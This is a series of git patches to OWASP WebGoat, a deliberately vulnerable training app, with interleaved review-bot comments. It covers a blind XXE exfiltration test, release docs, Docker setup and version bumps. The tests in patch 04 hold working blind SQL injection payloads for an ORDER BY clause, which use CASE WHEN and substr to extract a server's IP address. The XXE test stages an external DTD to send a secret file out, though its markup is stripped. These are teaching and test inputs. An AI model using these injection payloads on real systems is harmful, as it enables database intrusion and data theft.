From 4d7d0058c3ba0b4e542ed7e964ee1056207b7a08 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 20 Jun 2018 18:38:16 +0200 Subject: [PATCH 01/28] Update how to create a release document --- CREATE_RELEASE.MD | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/CREATE_RELEASE.MD b/CREATE_RELEASE.MD index f9199020d..d7d566313 100644 --- a/CREATE_RELEASE.MD +++ b/CREATE_RELEASE.MD @@ -12,18 +12,14 @@ At the moment we use Gitflow, for a release you create a new release branch and ``` git checkout develop git flow release start -mvn versions:set < -git commit -am "New release, updaing pom.xml" +mvn versions:set < +git commit -am "New release, updating pom.xml" git flow release publish +git push --tags ``` -Now we can make a new release, be sure you committed all your changes. +Now Travis takes over and will create the release in Github and on Docker Hub. -``` -git tag v8.0.0.M15 -git push origin v8.0.0.M15 -``` - -Now Travis takes over and will create the release in Github and on Docker Hub. +NOTE: the `mvn versions:set` command above is just there to make sure the master branch contains the latest version From 651698d96cc5fd272459ffba32fcbea62f103475 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 21 Jun 2018 07:17:27 +0200 Subject: [PATCH 02/28] Add different solution for XXE attack --- .../plugin/BlindSendFileAssignmentTest.java | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java index 621fdd1b3..606b51318 100644 --- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java +++ b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java 
@@ -89,7 +89,34 @@ public class BlindSendFileAssignmentTest extends LessonTest { "%remote;" + "]>" + "test&send;"; + performXXE(xml); + } + @Test + public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception { + File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt"); + //Host DTD on WebWolf site + String dtd = "\n" + + "\">\n"; + webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd")) + .willReturn(aResponse() + .withStatus(200) + .withBody(dtd))); + webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200))); + + //Make the request from WebGoat + String xml = "" + + "\n" + + "" + + "%remote;" + + "%all;" + + "]>" + + "test&send;"; + performXXE(xml); + } + + private void performXXE(String xml) throws Exception { //Call with XXE injection mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind") .content(xml)) From cb18295f9faa10b75aa09d011ea2e7a6ee8549ce Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 21 Jun 2018 07:53:21 +0200 Subject: [PATCH 03/28] Update hint --- .../src/main/resources/i18n/WebGoatLabels.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties index 709165e15..063e1d3b5 100644 --- a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties +++ b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties 
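Review bot: `targetFile` in solveOnlyParamReferenceEntityInExternalDTD is assigned but never read anywhere in the hunk, so the new test neither checks that file nor passes it on to `performXXE(String)`; either remove the line or widen the helper to take the file and assert on it, otherwise the test passes without exercising what the name promises. The DTD and XML literals in the added method appear with their markup stripped on this page, so their content cannot be judged here. The extracted helper has no comment; a one-liner such as `/** Posts the given XML body to /xxe/blind as the lesson's input and checks the lesson response. */` would do. `performXXE` continues past the end of the hunk.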
@@ -15,7 +15,7 @@ password-reset-not-solved=Sorry but you did not redirect the reset link to WebWo password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf. password-reset-hint2=Look at the link, can you think how the server creates this link? password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link... -password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090 +password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090? password-reset-hint5=Intercept the request and change the host header login_failed=Login failed login_failed.tom=Sorry only Tom can login at the moment \ No newline at end of file From 2233550fe1692e364f50eac58ad31d854885a848 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 22 Jun 2018 14:12:37 +0200 Subject: [PATCH 04/28] Adding more solutions for SQL order by lesson --- .../mitigation/SqlInjectionLesson12aTest.java | 46 +++++++++++++++---- 1 file changed, 36 insertions(+), 10 deletions(-) diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java index 6e089f236..cee8e8c13 100644 --- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java +++ b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java @@ -28,7 +28,7 @@ public class SqlInjectionLesson12aTest extends LessonTest { private WebgoatContext context; @Before - public void setup() throws Exception { + public void setup() { SqlInjection sql = new SqlInjection(); when(webSession.getCurrentLesson()).thenReturn(sql); 
@@ -44,6 +44,40 @@ public class SqlInjectionLesson12aTest extends LessonTest { .andExpect(status().isOk()); } + @Test + public void addressCorrectShouldOrderByHostname() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + } + + @Test + public void addressCorrectShouldOrderByHostnameUsingSubstr() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '1') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,2,1) = '0') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,3,1) = '4') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + } + + @Test + public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '9') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev"))); + } + @Test public void trueShouldSortByHostname() throws Exception { 
mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") @@ -63,21 +97,13 @@ public class SqlInjectionLesson12aTest extends LessonTest { } @Test - public void passwordIncorrectShouldOrderByHostname() throws Exception { + public void addressIncorrectShouldOrderByHostname() throws Exception { mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '192.%' THEN hostname ELSE id END")) .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev"))); } - @Test - public void passwordCorrectShouldOrderByHostname() throws Exception { - mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") - .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END")) - - .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); - } - @Test public void postingCorrectAnswerShouldPassTheLesson() throws Exception { mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack12a") From f9e552f1cd9f73cb360d3361eb70964c0f5979a5 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 4 Jul 2018 19:15:54 +0200 Subject: [PATCH 05/28] Add instructions how to run WebGoat on Java 9 or higher --- README.MD | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.MD b/README.MD index ccfee85bb..e47961d5e 100644 --- a/README.MD +++ b/README.MD 
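Review bot: The three `mockMvc.perform(...)` chains in addressCorrectShouldOrderByHostnameUsingSubstr, and the single ones in the two neighbouring new tests, repeat the identical request setup and assertion and differ only in the `column` value and the expected first hostname. A small helper turns each case into one line of data, which also makes it obvious which ORDER BY expression maps to which expected ordering. The rename in the following hunk (`passwordIncorrectShouldOrderByHostname` to `addressIncorrectShouldOrderByHostname`) would then use the same helper.
```java
@Test
public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception {
    expectFirstHostname("case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '9') IS NOT NULL then hostname else id end", "webgoat-dev");
}

// … unchanged: other tests, each reduced to one expectFirstHostname(...) call …

/** Requests /SqlInjection/servers sorted by {@code column} and asserts the hostname of the first row. */
private void expectFirstHostname(String column, String expectedHostname) throws Exception {
    mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers")
            .param("column", column))
            .andExpect(status().isOk())
            .andExpect(jsonPath("$[0].hostname", is(expectedHostname)));
}
```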
@@ -40,6 +40,12 @@ java -jar webgoat-server-<>.jar [--server.port=8080] [--server.address= By default WebGoat starts on port 8080 with `--server.port` you can specify a different port. With `server.address` you can bind it to a different address (default localhost) +If you use Java 9 or higher you need to run WebGoat as follows: + +```Shell +java --add-modules java.xml.bind -jar webgoat-server-8.0.0.VERSION.jar +``` + ## 2. Run using Docker From time to time we publish a new development preview of WebGoat 8 on Docker HUB, you can download this version From 63a50df7a1518103eed302994ada534381adcb08 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 6 Jul 2018 18:22:29 +0200 Subject: [PATCH 06/28] Add hint to lesson users no longer have guess the complete ip address --- .gitignore | 5 +++-- .../main/resources/lessonPlans/en/SqlInjection_order_by.adoc | 3 ++- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/.gitignore b/.gitignore index 85137d053..32b59f04e 100644 --- a/.gitignore +++ b/.gitignore @@ -44,5 +44,6 @@ webgoat-server/mongo-data/* webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml **/.sts4-cache/* **/.vscode/* - -/.sonatype \ No newline at end of file +**/.factorypath +/.sonatype +**/bin/* \ No newline at end of file diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc index 6adb9156b..6e8ff54e0 100644 --- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc +++ b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc 
@@ -1,4 +1,5 @@ In this assignment try to perform an SQL injection through the ORDER BY field. -Try to find the ip address of the `webgoat-prd` server. +Try to find the ip address of the `webgoat-prd` server, guessing the complete +ip address might take too long so we give you the last part: `xxx.130.219.202` Note: The submit field of this assignment is *NOT* vulnerable for an SQL injection. \ No newline at end of file From 1252e3dc212fb25dabe1be48f69f1d7ce1ad7c9d Mon Sep 17 00:00:00 2001 
From: Nanne Baars Date: Tue, 17 Jul 2018 20:17:35 +0200 Subject: [PATCH 07/28] Update instructions to use docker-compose only --- .gitignore | 6 ++- README.MD | 43 ++++++------------- docker-compose-local.yml | 18 ++++++++ docker-compose-postgres.yml | 5 +++ docker-compose.yml | 19 ++------ pom.xml | 2 +- scripts/start.sh | 18 ++++++++ webgoat-container/pom.xml | 2 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- .../insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 +- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- .../lessonPlans/en/IntroductionWebWolf.adoc | 16 ++----- webgoat-lessons/xxe/pom.xml | 2 +- webgoat-server/Dockerfile | 1 - webgoat-server/pom.xml | 2 +- .../owasp/webgoat/HSQLDBDatabaseConfig.java | 4 +- .../java/org/owasp/webgoat/StartWebGoat.java | 5 +++ webwolf/Dockerfile | 2 - webwolf/pom.xml | 2 +- 36 files changed, 99 insertions(+), 90 deletions(-) create mode 100644 docker-compose-local.yml create mode 100644 scripts/start.sh diff --git a/.gitignore b/.gitignore index 32b59f04e..549b59a14 100644 --- a/.gitignore +++ b/.gitignore 
@@ -46,4 +46,8 @@ webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml **/.vscode/* **/.factorypath /.sonatype -**/bin/* \ No newline at end of file +**/bin/* +webgoat.lck +webgoat.log +webgoat.properties +webgoat.script \ No newline at end of file diff --git a/README.MD b/README.MD index e47961d5e..3290fbee4 100644 --- a/README.MD +++ b/README.MD @@ -34,7 +34,7 @@ first thing that all hackers claim.* Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases) ```Shell -java -jar webgoat-server-<>.jar [--server.port=8080] [--server.address=localhost] +java -jar webgoat-server-8.0.0.VERSION.jar [--server.port=8080] [--server.address=localhost] ``` By default WebGoat starts on port 8080 with `--server.port` you can specify a different port. With `server.address` you 
@@ -48,40 +48,21 @@ java --add-modules java.xml.bind -jar webgoat-server-8.0.0.VERSION.jar ## 2. Run using Docker -From time to time we publish a new development preview of WebGoat 8 on Docker HUB, you can download this version -[https://hub.docker.com/r/webgoat/webgoat-8.0/](https://hub.docker.com/r/webgoat/webgoat-8.0/). -First install Docker, then open a command shell/window and type: +Every release is also published on [DockerHub]((https://hub.docker.com/r/webgoat/webgoat-8.0/)). -```Shell -docker pull webgoat/webgoat-8.0 -docker run -p 8080:8080 -it webgoat/webgoat-8.0 /home/webgoat/start.sh +### Using docker-compose + +The easiest way to start WebGoat as a Docker container is to use the `docker-compose.yml` [file](https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml) +from our Github repository. This will start both containers and it also takes care of setting up the +connection between WebGoat and WebWolf. + +```shell +curl https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml | docker-compose -f - up ``` -If you want to keep the database between Docker sessions you need to map the WebGoat data directory to a -folder on the host system as follows: - -```Shell -docker run -p 8080:8080 -it -v /tmp/webgoat-data:/home/webgoat/.webgoat-${VERSION} webgoat/webgoat-8.0 /home/webgoat/start.sh -``` - -where `${VERSION}` is for example `v8.0.0.M14`. The data will now be stored in `/tmp/webgoat-data` on your host system. - -Wait for the Docker container to start, and run `docker ps` to verify it's running. - -- If you are using `docker-machine`, verify the machine IP using `docker-machine env` -- If you are using `boot2docker` on OSX, verify the IP by running `docker network inspect bridge` -- Otherwise, the host will be bound to localhost - -Once you have the IP and port, you'll want to navigate to the `/WebGoat` path in the URL. 
For example: - -``` -http://192.168.99.100:8080/WebGoat -``` - -Here you'll be able to register a new user and get started. - -_Please note: this version may not be completely in sync with the develop branch._ +**Important**: the current directory on your host will be mapped into the container for keeping state. +Using the `docker-compose` file will simplify getting WebGoat and WebWolf up and running. ## 3. Run from the sources diff --git a/docker-compose-local.yml b/docker-compose-local.yml new file mode 100644 index 000000000..f65bea120 --- /dev/null +++ b/docker-compose-local.yml @@ -0,0 +1,18 @@ +version: '2.1' + +services: + webgoat: + image: webgoat/webgoat-v8.0.0.snapshot + environment: + - WEBWOLF_HOST=webwolf + - WEBWOLF_PORT=9090 + ports: + - "8080:8080" + volumes: + - .:/home/webgoat/.webgoat + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0 --server.port=8080" + webwolf: + image: webgoat/webwolf-v8.0.0.snapshot + ports: + - "9090:9090" + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" diff --git a/docker-compose-postgres.yml b/docker-compose-postgres.yml index 919cbd509..56c9a707c 100644 --- a/docker-compose-postgres.yml +++ b/docker-compose-postgres.yml @@ -12,6 +12,8 @@ services: - spring.datasource.password=webgoat - spring.datasource.driver-class-name=org.postgresql.Driver - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect + - webgoat.server.directory=/home/webgoat/.webgoat/ + - webgoat.user.directory=/home/webgoat/.webgoat/ ports: - "8080:8080" webwolf: 
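Review bot: The webwolf service in the new docker-compose-local.yml relies on `bash -c "sleep 8 && java ..."` to wait for WebGoat's embedded HSQLDB on port 9001, which is a timing race rather than an ordering guarantee: a slow host may still get a connection refusal and a fast one waits for nothing. Compose file format 2.1, which this file declares, supports `depends_on` with `condition: service_healthy`, so a `healthcheck` on the webgoat service plus `depends_on: webgoat: condition: service_healthy` on webwolf would replace the sleep. The same `sleep 8` is introduced in docker-compose.yml in this commit. A comment on the `- .:/home/webgoat/.webgoat` volume line, e.g. `# database and lesson state are written to the directory docker-compose is run from`, would save users the surprise the README's "Important" note describes.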
@@ -27,6 +29,9 @@ services: db: container_name: webgoat_db image: postgres:latest +# Uncomment to store the state of the database on the host. +# volumes: +# - ./database:/var/lib/postgresql environment: - POSTGRES_PASSWORD=webgoat - POSTGRES_USER=webgoat diff --git a/docker-compose.yml b/docker-compose.yml index 725195504..a4e888edb 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -6,24 +6,13 @@ services: environment: - WEBWOLF_HOST=webwolf - WEBWOLF_PORT=9090 - - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - "8080:8080" - depends_on: - - db + volumes: + - .:/home/webgoat/.webgoat + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0" webwolf: image: webgoat/webwolf - environment: - - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - "9090:9090" - depends_on: - - db - db: - image: blacklabelops/hsqldb - container_name: webgoat_db - environment: - - HSQLDB_TRACE=false - - HSQLDB_SILENT=true - - HSQLDB_DATABASE_NAME=webgoat - - HSQLDB_DATABASE_ALIAS=webgoat + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat" diff --git a/pom.xml b/pom.xml index aa855b919..206ecb2ed 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0.M20 + v8.0.0.SNAPSHOT WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application diff --git a/scripts/start.sh b/scripts/start.sh new file mode 100644 index 000000000..3380882af --- /dev/null +++ b/scripts/start.sh 
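Review bot: The webwolf command in docker-compose.yml still points at `jdbc:hsqldb:hsql://webgoat_db:9001/webgoat`, but this hunk deletes the `db` service whose `container_name` was `webgoat_db`, so that hostname no longer resolves on the compose network and WebWolf will fail to reach the database. With the database now served from inside the WebGoat container, the host should presumably be the service name, as docker-compose-local.yml in the same commit already does: `--spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat`. Note also that `depends_on` on webgoat is removed without a replacement, so nothing but the `sleep 8` orders the two containers.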
@@ -0,0 +1,18 @@ +#!/usr/bin/env bash + +DATABASE_PORT=9001 + +checkDatabaseAvailable(){ + + #for i in $(seq 1 5); do command && s=0 && break || s=$? && sleep 15; done; (exit $s) + local started = $(netstat -lnt | grep ${DATABASE_PORT}) + echo $? +} + +#java -Djava.security.egd=file:/dev/./urandom -jar home/webgoat/webgoat.jar --server.address=0.0.0.0 +$(checkDatabaseAvailable) + + +#java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 + + diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 8821d469d..11edb880f 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 460175912..6e63139a2 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index 0d81dd53a..29f56754c 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index 58f7f9daa..b8f9144c9 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index 7f37c3064..485e42b76 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml 
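Review bot: `local started = $(netstat -lnt | grep ${DATABASE_PORT})` in the new scripts/start.sh is not an assignment in bash — the spaces make `=` and the grep output separate words handed to `local` — and the following `echo $?` reports the status of `local`, not of grep. The call site `$(checkDatabaseAvailable)` then executes whatever was echoed as a command. Let the function return grep's status and poll it: `checkDatabaseAvailable(){ netstat -lnt | grep -q ":${DATABASE_PORT} "; }` and `until checkDatabaseAvailable; do sleep 2; done` (the leading colon keeps 9001 from matching 19001; this assumes netstat exists in the image). Both java launch lines are still commented out, so as committed the script starts nothing.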
@@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index a18aa3720..b8c1021ff 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index 49658a14c..cc8d429c5 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 47cf3df7b..2c7fe60c0 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 9d112c91b..9fdf8d13b 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index 72aafac2f..a78c58090 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index a147a7f9d..6620f6920 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file 
diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index cf9f62c28..68a95c885 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index 7e392e4d5..ed6bd358e 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index ce32296b1..ec6861190 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 7ac4b0b5f..8b266b4c2 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index ec760f813..5e78f3b0e 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index e3e19e957..e5f66efdf 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0.M20 + v8.0.0.SNAPSHOT org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT 
diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index 32bc48b23..46677291d 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index b38a8e124..df1c57c62 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index 864d625a2..d4e2db171 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index ef1890980..22745b96a 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc 